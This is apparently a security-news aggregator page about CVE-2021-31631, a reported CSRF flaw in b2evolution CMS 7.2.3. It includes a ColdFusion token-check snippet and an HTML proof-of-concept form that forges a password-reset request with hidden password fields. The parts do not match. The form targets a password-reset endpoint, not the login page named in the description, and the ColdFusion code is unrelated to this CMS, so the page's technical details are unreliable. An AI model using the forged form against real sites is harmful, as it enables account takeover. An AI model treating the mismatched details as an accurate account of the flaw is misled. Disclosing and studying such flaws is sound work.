Security
Headlines
HeadlinesLatestCVEs

Headline

CVE-2021-31631: CSRF

b2evolution CMS v7.2.3 was discovered to contain a Cross-Site Request Forgery (CSRF) via the User login page. This vulnerability allows attackers to escalate privileges.

CVE
#csrf#vulnerability#web

There is a Cross-Site Request Forgery (CSRF) on 2bevolution version 7.2.3 attack which forces an end user to execute unwanted actions on a web application in which he/she is currently authenticated. This occurs because web browsers automatically include most credentials with each request, such as session cookies, basic authentication header, IP address, and client side SSL certificates.

<cfif NOT StructIsEmpty(form) >

<cfif NOT CSRFverifyToken(form.token)>

<cfabort showerror="Invalid Token" />

</cfif>

<cfoutput><p>Hello, #EncodeForHTML(form.name)#</p></cfoutput>

</cfif>

<html>

<body>

<form action="https://localhost/users/59215b8f0ec7c37a4ca27b00/password_reset" method="POST">

<input type="hidden" name="utf8" value="�" />

<input type="hidden" name="_method" value="patch" />

<input type="hidden" name="old_password" value="phew phew" />

<input type="hidden" name="password" value="qweqji" />

<input type="hidden" name="password_confirmation" value="qweqji" />

<input type="submit" value="Submit request" />

</form>

</body>

</html>

CVE: Latest News

CVE-2023-50976: Transactions API Authorization by oleiman · Pull Request #14969 · redpanda-data/redpanda
CVE-2023-6905
CVE-2023-6903
CVE-2023-6904
CVE-2023-3907